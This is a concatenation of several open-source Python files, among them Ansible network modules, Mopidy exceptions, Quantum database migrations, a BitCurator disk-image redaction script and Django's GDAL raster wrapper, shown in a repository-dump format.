        tstamp = time.strftime("%Y-%m-%d@%H:%M:%S", time.localtime(time.time()))
        filename = '%s/%s_config.%s' % (backup_path, host, tstamp)
        # Context manager so the file handle is closed deterministically.
        with open(filename, 'w') as f:
            f.write(contents)
        return filename

    def _handle_template(self):
        """Locate, load, and render the `src` template, replacing
        self._task.args['src'] with the rendered text.

        Raises ValueError when the source cannot be found or read.
        """
        src = self._task.args.get('src')
        working_path = self._get_working_path()
        # BUG FIX: urlsplit was previously called on the literal string
        # 'src', so URL-style sources were never detected.
        if os.path.isabs(src) or urlsplit(src).scheme:
            source = src
        else:
            source = self._loader.path_dwim_relative(working_path, 'templates', src)
            if not source:
                source = self._loader.path_dwim_relative(working_path, src)
        if not os.path.exists(source):
            raise ValueError('path specified in src not found')
        try:
            with open(source, 'r') as f:
                template_data = to_text(f.read())
        except IOError:
            # BUG FIX: this previously *returned* a failure dict, which
            # run() silently discards; raise so the error propagates and
            # is reported via run()'s ValueError handler.
            raise ValueError('unable to load src file')
        # Create a template search path in the following order:
        # [working_path, self_role_path, dependent_role_paths, dirname(source)]
        searchpath = [working_path]
        if self._task._role is not None:
            searchpath.append(self._task._role._role_path)
            # BUG FIX: hasattr() was called with the typo "_block:" (stray
            # colon), so dependent role paths were never appended.
            if hasattr(self._task, "_block"):
                dep_chain = self._task._block.get_dep_chain()
                if dep_chain is not None:
                    for role in dep_chain:
                        searchpath.append(role._role_path)
        searchpath.append(os.path.dirname(source))
        self._templar.environment.loader.searchpath = searchpath
        self._task.args['src'] = self._templar.template(template_data)
|
liamw9534/mopidy
|
refs/heads/master
|
mopidy/exceptions.py
|
1
|
from __future__ import unicode_literals
class MopidyException(Exception):
    """Base class for Mopidy exceptions.

    Stores the message explicitly and exposes it via a read/write
    ``message`` property, since the implicit ``Exception.message``
    attribute was deprecated in Python 2.6.
    """

    def __init__(self, message, *args, **kwargs):
        super(MopidyException, self).__init__(message, *args, **kwargs)
        self._message = message

    @property
    def message(self):
        """The human-readable error message."""
        return self._message

    @message.setter  # noqa
    def message(self, value):
        self._message = value
# Category subclasses of MopidyException; each class name identifies the
# component the error belongs to, with no behavior of its own.
class BackendError(MopidyException):
    pass
class ExtensionError(MopidyException):
    pass
class FrontendError(MopidyException):
    pass
class MixerError(MopidyException):
    pass
class ScannerError(MopidyException):
    pass
|
linvictor88/vse-lbaas-driver
|
refs/heads/master
|
quantum/db/migration/alembic_migrations/common_ext_ops.py
|
20
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 Openstack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Upgrade/downgrade operations for 'community' extensions
"""
from alembic import op
import sqlalchemy as sa
def upgrade_l3():
    """Create the tables for the l3 extension: routers,
    externalnetworks, and floatingips."""
    op.create_table(
        'routers',
        sa.Column('tenant_id', sa.String(length=255), nullable=True),
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('status', sa.String(length=16), nullable=True),
        sa.Column('admin_state_up', sa.Boolean(), nullable=True),
        sa.Column('gw_port_id', sa.String(length=36), nullable=True),
        sa.ForeignKeyConstraint(['gw_port_id'], ['ports.id'], ),
        sa.PrimaryKeyConstraint('id')
    )
    # Marks a network as external; rows are removed with their network.
    op.create_table(
        'externalnetworks',
        sa.Column('network_id', sa.String(length=36), nullable=False),
        sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('network_id')
    )
    # floatingips references both ports and routers created above.
    op.create_table(
        'floatingips',
        sa.Column('tenant_id', sa.String(length=255), nullable=True),
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('floating_ip_address', sa.String(length=64), nullable=False),
        sa.Column('floating_network_id', sa.String(length=36), nullable=False),
        sa.Column('floating_port_id', sa.String(length=36), nullable=False),
        sa.Column('fixed_port_id', sa.String(length=36), nullable=True),
        sa.Column('fixed_ip_address', sa.String(length=64), nullable=True),
        sa.Column('router_id', sa.String(length=36), nullable=True),
        sa.ForeignKeyConstraint(['fixed_port_id'], ['ports.id'], ),
        sa.ForeignKeyConstraint(['floating_port_id'], ['ports.id'], ),
        sa.ForeignKeyConstraint(['router_id'], ['routers.id'], ),
        sa.PrimaryKeyConstraint('id')
    )
def upgrade_quota(options=None):
    """Create the quotas table, but only when the migration options
    enable the Folsom quota DB (``folsom_quota_db_enabled``)."""
    opts = options or {}
    if not opts.get('folsom_quota_db_enabled'):
        return
    op.create_table(
        'quotas',
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('tenant_id', sa.String(255), index=True),
        sa.Column('resource', sa.String(255)),
        sa.Column('limit', sa.Integer()),
        sa.PrimaryKeyConstraint('id')
    )
def downgrade_l3():
    """Drop the l3 tables, floatingips first since it references the
    others via foreign keys."""
    op.drop_table('floatingips')
    op.drop_table('routers')
    op.drop_table('externalnetworks')
def downgrade_quota(options=None):
    """Drop the quotas table if the quota DB option was enabled."""
    enabled = (options or {}).get('folsom_quota_db_enabled')
    if enabled:
        op.drop_table('quotas')
|
pombredanne/bitcurator
|
refs/heads/master
|
dfxml/python/imicrosoft_redact.py
|
4
|
#!/usr/bin/python
"""This is a small program written with the python fiwalk framework to
break the microsoft executables from the m57 corpus. It does this by changing
characters in the first 4096 bytes of the executable that are over hex 80 to
hex FF"""
import os.path,sys
from subprocess import Popen,call,PIPE
sys.path.append(os.getenv("DOMEX_HOME") + "/src/lib/") # add the library
sys.path.append(os.getenv("DOMEX_HOME") + "/src/fiwalk/python/") # add the library
import fiwalk,hashlib
import xml.parsers.expat
# File extensions eligible for redaction.
redact_extensions = set([".dll",".exe",".com"])
# Filenames collected from previously written *redacted.xml reports; files
# listed there are always re-selected by should_redact().
redact_filenames = set()
# Only the first redact_max_size bytes of a file are overwritten.
redact_max_size = 4096
def should_redact(fi):
    # Files named in a previous redaction report are always selected again.
    if fi.filename() in redact_filenames: return True
    fnl = fi.filename().lower()
    (root,ext) = os.path.splitext(fnl)
    if options.debug: print "\r",fnl,
    # Candidates: Windows executables/libraries by extension and path prefix.
    if ext in redact_extensions and fnl.startswith("windows"):
        try:
            content = fi.contents(icat_fallback=False)
        except ValueError:
            if options.debug: print " *** can't redact --- is compressed *** "
            return False
        if not content:
            if options.debug: print " *** can't redact --- no content ***"
            return False
        # Require a "Microsoft" marker, as plain ASCII or as UTF-16LE.
        if "Microsoft" in content:
            return True
        if "\0M\0i\0c\0r\0o\0s\0o\0f\0t" in content:
            return True
        if options.debug: print " *** won't redact --- no Microsoft ***"
        return False
    return False
def redact(fi):
    """Overwrite the leading bytes of a qualifying file inside the disk
    image (when --commit is given) and append a <fileobject> record with
    before/after hashes to the global xml_out report."""
    from xml.sax.saxutils import escape
    global xml_out,options
    if not should_redact(fi): return
    # Get the first byterun
    br = fi.byte_runs()[0]
    if br.img_offset==0: return   # this run isn't on the disk
    if br.bytes==0: return        # too small to redact
    content = fi.contents()       # before redaction
    redact_bytes = min(redact_max_size,br.bytes)
    fi.imagefile.seek(br.img_offset)
    sector = fi.imagefile.read(redact_bytes)
    # Redact the data that was read.  Per the module docstring, characters
    # at or above hex 80 become hex FF.
    # BUG FIX: the previous version returned the four-character *string*
    # '0xff' (not the byte '\xff'), which grew `sector` and would have
    # written past the region that was read; it also compared against '~'
    # (0x7e) rather than '\x80' as documented.
    def redact_function(ch):
        if ch < '\x80': return ch
        return '\xff'
    sector = "".join(map(redact_function,sector))
    # Now write it back, but only when --commit was requested.
    if options.commit:
        fi.imagefile.seek(br.img_offset)
        fi.imagefile.write(sector)
    redacted_content = fi.contents() # after redaction
    xml_out.write("<fileobject>\n<filename>%s</filename>\n" % (escape(fi.filename())))
    xml_out.write("  <filesize>%d</filesize>\n" % (len(content)))
    xml_out.write("  <inode>%s</inode>\n" % (fi.inode()))
    xml_out.write("  <redact_image_offset>%d</redact_image_offset>\n" % (br.img_offset))
    xml_out.write("  <redact_bytes>%d</redact_bytes>\n" % (redact_bytes))
    xml_out.write("  <before_redact>\n")
    xml_out.write("     <hashdigest type='MD5'>%s</hashdigest>\n" % (hashlib.md5(content).hexdigest()))
    xml_out.write("     <hashdigest type='SHA1'>%s</hashdigest>\n" % (hashlib.sha1(content).hexdigest()))
    xml_out.write("  </before_redact>\n")
    xml_out.write("  <after_redact>\n")
    xml_out.write("     <hashdigest type='MD5'>%s</hashdigest>\n" % (hashlib.md5(redacted_content).hexdigest()))
    xml_out.write("     <hashdigest type='SHA1'>%s</hashdigest>\n" % (hashlib.sha1(redacted_content).hexdigest()))
    xml_out.write("  </after_redact>\n")
    xml_out.write("</fileobject>\n")
if __name__=="__main__":
import sys,time
from optparse import OptionParser
from subprocess import Popen,PIPE
global options,xml_out
from glob import glob
parser = OptionParser()
parser.usage = "%prog [options] imagefile"
parser.add_option("-d","--debug",help="prints debugging info",dest="debug",action="store_true")
parser.add_option("-c","--commit",help="Really do the redaction",action="store_true")
parser.add_option("--all",help="Do all",action="store_true")
(options,args) = parser.parse_args()
# First read all of the redaction files
for fn in glob("*redacted.xml*"):
try:
fiwalk.fiwalk_using_sax(xmlfile=open(fn),callback=lambda fi:redact_filenames.add(fi.filename()))
except xml.parsers.expat.ExpatError:
print "Invalid XML file:",fn
print "number of filenames in redaction XML:",len(redact_filenames)
if options.all:
for fn in glob("*.aff"):
raw = fn.replace(".aff",".raw")
if not os.path.exists(raw):
print "%s --> %s" % (fn,raw)
if call(['afconvert','-e','raw',fn])!=0:
raise RuntimeError,"afconvert of %s failed" % fn
fns = glob("*.raw")
else:
fns = args
for fn in fns:
if fn.endswith(".aff"):
raise ValueError,"Cannot redact AFF files"
print "Redacting %s" % fn
xml_out = open(fn.replace(".raw","-redacted.xml"),"w")
xml_out.write("<?xml version='1.0' encoding='ISO-8859-1'?>\n")
xml_out.write("<redaction_report>\n")
mode = "rb"
if options.commit: mode="r+b"
fiwalk.fiwalk_using_sax(imagefile=open(args[0],mode),callback=redact)
xml_out.write("</redaction_report>\n")
|
shsingh/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/fortimanager/fmgr_ha.py
|
38
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community"
}
DOCUMENTATION = '''
---
module: fmgr_ha
version_added: "2.8"
notes:
- Full Documentation at U(https://ftnt-ansible-docs.readthedocs.io/en/latest/).
author:
- Luke Weighall (@lweighall)
- Andrew Welsh (@Ghilli3)
- Jim Huber (@p4r4n0y1ng)
short_description: Manages the High-Availability State of FortiManager Clusters and Nodes.
description: Change HA state or settings of FortiManager nodes (Standalone/Master/Slave).
options:
fmgr_ha_mode:
description:
- Sets the role of the FortiManager host for HA.
required: false
choices: ["standalone", "master", "slave"]
fmgr_ha_peer_ipv4:
description:
- Sets the IPv4 address of a HA peer.
required: false
fmgr_ha_peer_ipv6:
description:
- Sets the IPv6 address of a HA peer.
required: false
fmgr_ha_peer_sn:
description:
- Sets the HA Peer Serial Number.
required: false
fmgr_ha_peer_status:
description:
- Sets the peer status to enable or disable.
required: false
choices: ["enable", "disable"]
fmgr_ha_cluster_pw:
description:
- Sets the password for the HA cluster. Only required once. System remembers between HA mode switches.
required: false
fmgr_ha_cluster_id:
description:
- Sets the ID number of the HA cluster. Defaults to 1.
required: false
default: 1
fmgr_ha_hb_threshold:
description:
- Sets heartbeat lost threshold (1-255).
required: false
default: 3
fmgr_ha_hb_interval:
description:
- Sets the heartbeat interval (1-255).
required: false
default: 5
fmgr_ha_file_quota:
description:
- Sets the File quota in MB (2048-20480).
required: false
default: 4096
'''
EXAMPLES = '''
- name: SET FORTIMANAGER HA NODE TO MASTER
fmgr_ha:
fmgr_ha_mode: "master"
fmgr_ha_cluster_pw: "fortinet"
fmgr_ha_cluster_id: "1"
- name: SET FORTIMANAGER HA NODE TO SLAVE
fmgr_ha:
fmgr_ha_mode: "slave"
fmgr_ha_cluster_pw: "fortinet"
fmgr_ha_cluster_id: "1"
- name: SET FORTIMANAGER HA NODE TO STANDALONE
fmgr_ha:
fmgr_ha_mode: "standalone"
- name: ADD FORTIMANAGER HA PEER
fmgr_ha:
fmgr_ha_peer_ipv4: "192.168.1.254"
fmgr_ha_peer_sn: "FMG-VM1234567890"
fmgr_ha_peer_status: "enable"
- name: CREATE CLUSTER ON MASTER
fmgr_ha:
fmgr_ha_mode: "master"
fmgr_ha_cluster_pw: "fortinet"
fmgr_ha_cluster_id: "1"
fmgr_ha_hb_threshold: "10"
fmgr_ha_hb_interval: "15"
fmgr_ha_file_quota: "2048"
'''
RETURN = """
api_result:
description: full API response, includes status code and message
returned: always
type: str
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortimanager.fortimanager import FortiManagerHandler
from ansible.module_utils.network.fortimanager.common import FMGBaseException
from ansible.module_utils.network.fortimanager.common import FMGRCommon
from ansible.module_utils.network.fortimanager.common import FMGRMethods
from ansible.module_utils.network.fortimanager.common import DEFAULT_RESULT_OBJ
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def fmgr_set_ha_mode(fmgr, paramgram):
    """
    :param fmgr: The fmgr object instance from fortimanager.py
    :type fmgr: class object
    :param paramgram: The formatted dictionary of options to process
    :type paramgram: dict
    :return: The response from the FortiManager
    :rtype: dict
    """
    datagram = {}
    mode = str(paramgram["fmgr_ha_mode"].lower())
    # Common settings shared by both the clustered and standalone payloads.
    base = {
        "mode": paramgram["fmgr_ha_mode"],
        "file-quota": paramgram["fmgr_ha_file_quota"],
        "hb-interval": paramgram["fmgr_ha_hb_interval"],
        "hb-lost-threshold": paramgram["fmgr_ha_hb_threshold"],
        "clusterid": paramgram["fmgr_ha_cluster_id"],
    }
    if paramgram["fmgr_ha_cluster_pw"] is not None and mode != "standalone":
        # Master/slave payload additionally carries the cluster password.
        datagram = dict(base, password=paramgram["fmgr_ha_cluster_pw"])
    elif mode == "standalone":
        datagram = base
    url = '/cli/global/system/ha'
    return fmgr.process_request(url, datagram, FMGRMethods.SET)
def fmgr_get_ha_peer_list(fmgr):
    """
    Query the FortiManager for its currently configured HA peers.

    :param fmgr: The fmgr object instance from fortimanager.py
    :type fmgr: class object
    :return: The response from the FortiManager
    :rtype: dict
    """
    # The GET takes no request body, so the datagram is empty.
    # (The previous version also created an unused `paramgram` local and
    # documented a `paramgram` parameter the function does not take.)
    datagram = {}
    url = '/cli/global/system/ha/peer/'
    return fmgr.process_request(url, datagram, FMGRMethods.GET)
def fmgr_set_ha_peer(fmgr, paramgram):
    """
    :param fmgr: The fmgr object instance from fortimanager.py
    :type fmgr: class object
    :param paramgram: The formatted dictionary of options to process
    :type paramgram: dict
    :return: The response from the FortiManager
    :rtype: dict
    """
    # Map the module parameters onto the CLI API's field names.
    datagram = {
        "ip": paramgram["fmgr_ha_peer_ipv4"],
        "ip6": paramgram["fmgr_ha_peer_ipv6"],
        "serial-number": paramgram["fmgr_ha_peer_sn"],
        "status": paramgram["fmgr_ha_peer_status"],
        "id": paramgram["peer_id"],
    }
    url = '/cli/global/system/ha/peer/'
    return fmgr.process_request(url, datagram, FMGRMethods.SET)
def main():
    """Entry point: parse module arguments, optionally switch the HA mode,
    then add/update/disable HA peers as requested."""
    argument_spec = dict(
        fmgr_ha_mode=dict(required=False, type="str", choices=["standalone", "master", "slave"]),
        fmgr_ha_cluster_pw=dict(required=False, type="str", no_log=True),
        fmgr_ha_peer_status=dict(required=False, type="str", choices=["enable", "disable"]),
        fmgr_ha_peer_sn=dict(required=False, type="str"),
        fmgr_ha_peer_ipv4=dict(required=False, type="str"),
        fmgr_ha_peer_ipv6=dict(required=False, type="str"),
        fmgr_ha_hb_threshold=dict(required=False, type="int", default=3),
        fmgr_ha_hb_interval=dict(required=False, type="int", default=5),
        fmgr_ha_file_quota=dict(required=False, type="int", default=4096),
        fmgr_ha_cluster_id=dict(required=False, type="int", default=1)
    )
    required_if = [
        ['fmgr_ha_peer_ipv4', 'present', ['fmgr_ha_peer_sn', 'fmgr_ha_peer_status']],
        ['fmgr_ha_peer_ipv6', 'present', ['fmgr_ha_peer_sn', 'fmgr_ha_peer_status']],
        ['fmgr_ha_mode', 'master', ['fmgr_ha_cluster_pw', 'fmgr_ha_cluster_id']],
        ['fmgr_ha_mode', 'slave', ['fmgr_ha_cluster_pw', 'fmgr_ha_cluster_id']],
    ]
    module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False, required_if=required_if)
    paramgram = {
        "fmgr_ha_mode": module.params["fmgr_ha_mode"],
        "fmgr_ha_cluster_pw": module.params["fmgr_ha_cluster_pw"],
        "fmgr_ha_peer_status": module.params["fmgr_ha_peer_status"],
        "fmgr_ha_peer_sn": module.params["fmgr_ha_peer_sn"],
        "fmgr_ha_peer_ipv4": module.params["fmgr_ha_peer_ipv4"],
        "fmgr_ha_peer_ipv6": module.params["fmgr_ha_peer_ipv6"],
        "fmgr_ha_hb_threshold": module.params["fmgr_ha_hb_threshold"],
        "fmgr_ha_hb_interval": module.params["fmgr_ha_hb_interval"],
        "fmgr_ha_file_quota": module.params["fmgr_ha_file_quota"],
        "fmgr_ha_cluster_id": module.params["fmgr_ha_cluster_id"],
    }
    module.paramgram = paramgram
    fmgr = None
    if module._socket_path:
        connection = Connection(module._socket_path)
        fmgr = FortiManagerHandler(connection, module)
        fmgr.tools = FMGRCommon()
    else:
        module.fail_json(**FAIL_SOCKET_MSG)
    # INIT FLAGS AND COUNTERS
    get_ha_peers = 0
    results = DEFAULT_RESULT_OBJ
    try:
        # Peer operations are requested when any peer-related option is set.
        if any(v is not None for v in (paramgram["fmgr_ha_peer_sn"], paramgram["fmgr_ha_peer_ipv4"],
                                       paramgram["fmgr_ha_peer_ipv6"], paramgram["fmgr_ha_peer_status"])):
            get_ha_peers = 1
    except Exception as err:
        raise FMGBaseException(err)
    try:
        # IF HA MODE IS NOT NULL, SWITCH THAT
        if paramgram["fmgr_ha_mode"] is not None:
            if (str.lower(paramgram["fmgr_ha_mode"]) != "standalone" and paramgram["fmgr_ha_cluster_pw"] is not None)\
                    or str.lower(paramgram["fmgr_ha_mode"]) == "standalone":
                results = fmgr_set_ha_mode(fmgr, paramgram)
                fmgr.govern_response(module=module, results=results, stop_on_success=False,
                                     ansible_facts=fmgr.construct_ansible_facts(results, module.params, paramgram))
            elif str.lower(paramgram["fmgr_ha_mode"]) != "standalone" and\
                    paramgram["fmgr_ha_mode"] is not None and\
                    paramgram["fmgr_ha_cluster_pw"] is None:
                module.exit_json(msg="If setting HA Mode of MASTER or SLAVE, you must specify a cluster password")
    except Exception as err:
        raise FMGBaseException(err)
    # IF GET_HA_PEERS IS ENABLED, LETS PROCESS THE PEERS
    try:
        if get_ha_peers == 1:
            # GET THE CURRENT LIST OF PEERS FROM THE NODE
            peers = fmgr_get_ha_peer_list(fmgr)
            # GET LENGTH OF RETURNED PEERS LIST AND ADD ONE FOR THE NEXT ID
            paramgram["next_peer_id"] = len(peers[1]) + 1
            # SET THE ACTUAL NUMBER OF PEERS
            num_of_peers = len(peers[1])
            # SET THE PEER ID FOR DISABLE METHOD
            # NOTE(review): this uses len(peers) (the response tuple), not
            # len(peers[1]) (the peer list) -- confirm this is intentional.
            paramgram["peer_id"] = len(peers) - 1
            # SET THE PEER LOOPCOUNT TO 1 TO START THE LOOP
            peer_loopcount = 1
            # LOOP THROUGH PEERS TO FIND THE SERIAL NUMBER MATCH TO GET THE RIGHT PEER ID
            # IDEA BEING WE DON'T WANT TO SUBMIT A BAD peer_id THAT DOESN'T JIVE WITH CURRENT DB ON FMG
            # SO LETS SEARCH FOR IT, AND IF WE FIND IT, WE WILL CHANGE THE PEER ID VARIABLES TO MATCH
            # IF NOT FOUND, LIFE GOES ON AND WE ASSUME THAT WE'RE ADDING A PEER
            # AT WHICH POINT THE next_peer_id VARIABLE WILL HAVE THE RIGHT PRIMARY KEY
            if paramgram["fmgr_ha_peer_sn"] is not None:
                while peer_loopcount <= num_of_peers:
                    # GET THE SERIAL NUMBER FOR CURRENT PEER IN LOOP TO COMPARE TO SN IN PLAYBOOK
                    try:
                        sn_compare = peers[1][peer_loopcount - 1]["serial-number"]
                        # IF THE SN IN THE PEERS MATCHES THE PLAYBOOK SN, SET THE IDS
                        if sn_compare == paramgram["fmgr_ha_peer_sn"]:
                            paramgram["peer_id"] = peer_loopcount
                            paramgram["next_peer_id"] = paramgram["peer_id"]
                    except Exception as err:
                        raise FMGBaseException(err)
                    # ADVANCE THE LOOP AND REPEAT UNTIL DONE
                    peer_loopcount += 1
            # IF THE PEER STATUS ISN'T IN THE PLAYBOOK, ASSUME ITS ENABLE
            if paramgram["fmgr_ha_peer_status"] is None:
                paramgram["fmgr_ha_peer_status"] = "enable"
            # IF THE PEER STATUS IS ENABLE, USE THE next_peer_id IN THE API CALL FOR THE ID
            if paramgram["fmgr_ha_peer_status"] == "enable":
                results = fmgr_set_ha_peer(fmgr, paramgram)
                fmgr.govern_response(module=module, results=results, stop_on_success=True,
                                     ansible_facts=fmgr.construct_ansible_facts(results,
                                                                                module.params, paramgram))
            # IF THE PEER STATUS IS DISABLE, WE HAVE TO HANDLE THAT A BIT DIFFERENTLY
            # JUST USING TWO DIFFERENT peer_id 's HERE
            if paramgram["fmgr_ha_peer_status"] == "disable":
                results = fmgr_set_ha_peer(fmgr, paramgram)
                fmgr.govern_response(module=module, results=results, stop_on_success=True,
                                     ansible_facts=fmgr.construct_ansible_facts(results, module.params, paramgram))
    except Exception as err:
        raise FMGBaseException(err)
    return module.exit_json(**results[1])
if __name__ == "__main__":
main()
|
zerc/django
|
refs/heads/master
|
django/contrib/gis/gdal/raster/source.py
|
297
|
import json
import os
from ctypes import addressof, byref, c_double, c_void_p
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.error import GDALException
from django.contrib.gis.gdal.prototypes import raster as capi
from django.contrib.gis.gdal.raster.band import BandList
from django.contrib.gis.gdal.raster.const import GDAL_RESAMPLE_ALGORITHMS
from django.contrib.gis.gdal.srs import SpatialReference, SRSException
from django.contrib.gis.geometry.regex import json_regex
from django.utils import six
from django.utils.encoding import (
force_bytes, force_text, python_2_unicode_compatible,
)
from django.utils.functional import cached_property
class TransformPoint(list):
    # Maps the point kind to its (x, y) positions inside the raster's
    # 6-element GDAL geotransform array.
    indices = {
        'origin': (0, 3),
        'scale': (1, 5),
        'skew': (2, 4),
    }

    def __init__(self, raster, prop):
        idx_x, idx_y = self.indices[prop]
        gtf = raster.geotransform
        list.__init__(self, [gtf[idx_x], gtf[idx_y]])
        self._raster = raster
        self._prop = prop

    @property
    def x(self):
        return self[0]

    @x.setter
    def x(self, value):
        self._set_component(0, value)

    @property
    def y(self):
        return self[1]

    @y.setter
    def y(self, value):
        self._set_component(1, value)

    def _set_component(self, axis, value):
        # Write through to the raster's geotransform so the change sticks.
        gtf = self._raster.geotransform
        gtf[self.indices[self._prop][axis]] = value
        self._raster.geotransform = gtf
@python_2_unicode_compatible
class GDALRaster(GDALBase):
"""
Wraps a raster GDAL Data Source object.
"""
    def __init__(self, ds_input, write=False):
        """
        Open or create a GDAL data source.

        ds_input may be a filesystem path, a JSON string or dict describing
        a new raster, or a c_void_p pointer to an existing GDAL dataset.
        `write` opens the source in update mode.
        """
        self._write = 1 if write else 0
        Driver.ensure_registered()
        # Preprocess json inputs. This converts json strings to dictionaries,
        # which are parsed below the same way as direct dictionary inputs.
        if isinstance(ds_input, six.string_types) and json_regex.match(ds_input):
            ds_input = json.loads(ds_input)
        # If input is a valid file path, try setting file as source.
        if isinstance(ds_input, six.string_types):
            if not os.path.exists(ds_input):
                raise GDALException('Unable to read raster source input "{}"'.format(ds_input))
            try:
                # GDALOpen will auto-detect the data source type.
                self._ptr = capi.open_ds(force_bytes(ds_input), self._write)
            except GDALException as err:
                raise GDALException('Could not open the datasource at "{}" ({}).'.format(ds_input, err))
        elif isinstance(ds_input, dict):
            # A new raster needs to be created in write mode
            self._write = 1
            # Create driver (in memory by default)
            driver = Driver(ds_input.get('driver', 'MEM'))
            # For out of memory drivers, check filename argument
            if driver.name != 'MEM' and 'name' not in ds_input:
                raise GDALException('Specify name for creation of raster with driver "{}".'.format(driver.name))
            # Check if width and height where specified
            if 'width' not in ds_input or 'height' not in ds_input:
                raise GDALException('Specify width and height attributes for JSON or dict input.')
            # Check if srid was specified
            if 'srid' not in ds_input:
                raise GDALException('Specify srid for JSON or dict input.')
            # Create GDAL Raster; datatype defaults to 6 when not given.
            self._ptr = capi.create_ds(
                driver._ptr,
                force_bytes(ds_input.get('name', '')),
                ds_input['width'],
                ds_input['height'],
                ds_input.get('nr_of_bands', len(ds_input.get('bands', []))),
                ds_input.get('datatype', 6),
                None
            )
            # Set band data if provided
            for i, band_input in enumerate(ds_input.get('bands', [])):
                band = self.bands[i]
                band.data(band_input['data'])
                if 'nodata_value' in band_input:
                    band.nodata_value = band_input['nodata_value']
            # Set SRID
            self.srs = ds_input.get('srid')
            # Set additional properties if provided
            if 'origin' in ds_input:
                self.origin.x, self.origin.y = ds_input['origin']
            if 'scale' in ds_input:
                self.scale.x, self.scale.y = ds_input['scale']
            if 'skew' in ds_input:
                self.skew.x, self.skew.y = ds_input['skew']
        elif isinstance(ds_input, c_void_p):
            # Instantiate the object using an existing pointer to a gdal raster.
            self._ptr = ds_input
        else:
            raise GDALException('Invalid data source input type: "{}".'.format(type(ds_input)))
    def __del__(self):
        # Close the underlying GDAL dataset; guard against `capi` already
        # being torn down during interpreter shutdown.
        if self._ptr and capi:
            capi.close_ds(self._ptr)
    def __str__(self):
        # String form is the data source name (the file path for
        # file-based rasters; see the `name` property).
        return self.name
    def __repr__(self):
        """
        Short-hand representation because WKB may be very large.
        """
        return '<Raster object at %s>' % hex(addressof(self._ptr))
    def _flush(self):
        """
        Flush all data from memory into the source file if it exists.
        The data that needs flushing are geotransforms, coordinate systems,
        nodata_values and pixel values. This function will be called
        automatically wherever it is needed.

        Raises GDALException when the raster was opened read-only.
        """
        # Raise an Exception if the value is being changed in read mode.
        if not self._write:
            raise GDALException('Raster needs to be opened in write mode to change values.')
        capi.flush_ds(self._ptr)
    @property
    def name(self):
        """
        Returns the name of this raster. Corresponds to filename
        for file-based rasters.
        """
        return force_text(capi.get_ds_description(self._ptr))
    @cached_property
    def driver(self):
        """
        Returns the GDAL Driver used for this raster.
        Cached: the driver cannot change for an open data source.
        """
        ds_driver = capi.get_ds_driver(self._ptr)
        return Driver(ds_driver)
    @property
    def width(self):
        """
        Width (X axis) in pixels.
        """
        return capi.get_ds_xsize(self._ptr)
    @property
    def height(self):
        """
        Height (Y axis) in pixels.
        """
        return capi.get_ds_ysize(self._ptr)
    @property
    def srs(self):
        """
        Returns the SpatialReference used in this GDALRaster,
        or None when no projection is set or the WKT cannot be parsed.
        """
        try:
            wkt = capi.get_ds_projection_ref(self._ptr)
            if not wkt:
                return None
            return SpatialReference(wkt, srs_type='wkt')
        except SRSException:
            return None
    @srs.setter
    def srs(self, value):
        """
        Sets the spatial reference used in this GDALRaster. The input can be
        a SpatialReference or any parameter accepted by the SpatialReference
        constructor.

        Raises ValueError for unsupported input types.
        """
        if isinstance(value, SpatialReference):
            srs = value
        elif isinstance(value, six.integer_types + six.string_types):
            srs = SpatialReference(value)
        else:
            raise ValueError('Could not create a SpatialReference from input.')
        # Store the reference as WKT and flush it to the source.
        capi.set_ds_projection_ref(self._ptr, srs.wkt.encode())
        self._flush()
    @property
    def geotransform(self):
        """
        Returns the geotransform of the data source as a list of 6 floats.
        Returns the default geotransform if it does not exist or has not been
        set previously. The default is [0.0, 1.0, 0.0, 0.0, 0.0, -1.0].
        """
        # Create empty ctypes double array for data
        gtf = (c_double * 6)()
        capi.get_ds_geotransform(self._ptr, byref(gtf))
        return list(gtf)
    @geotransform.setter
    def geotransform(self, values):
        "Sets the geotransform for the data source; raises ValueError unless given 6 numeric values."
        if sum([isinstance(x, (int, float)) for x in values]) != 6:
            raise ValueError('Geotransform must consist of 6 numeric values.')
        # Create ctypes double array with input and write data
        values = (c_double * 6)(*values)
        capi.set_ds_geotransform(self._ptr, byref(values))
        self._flush()
    @property
    def origin(self):
        """
        Coordinates of the raster origin.
        """
        # TransformPoint exposes .x/.y views into this raster's geotransform.
        return TransformPoint(self, 'origin')
    @property
    def scale(self):
        """
        Pixel scale in units of the raster projection.
        """
        # TransformPoint exposes .x/.y views into this raster's geotransform.
        return TransformPoint(self, 'scale')
    @property
    def skew(self):
        """
        Skew of pixels (rotation parameters).
        """
        # TransformPoint exposes .x/.y views into this raster's geotransform.
        return TransformPoint(self, 'skew')
@property
def extent(self):
"""
Returns the extent as a 4-tuple (xmin, ymin, xmax, ymax).
"""
# Calculate boundary values based on scale and size
xval = self.origin.x + self.scale.x * self.width
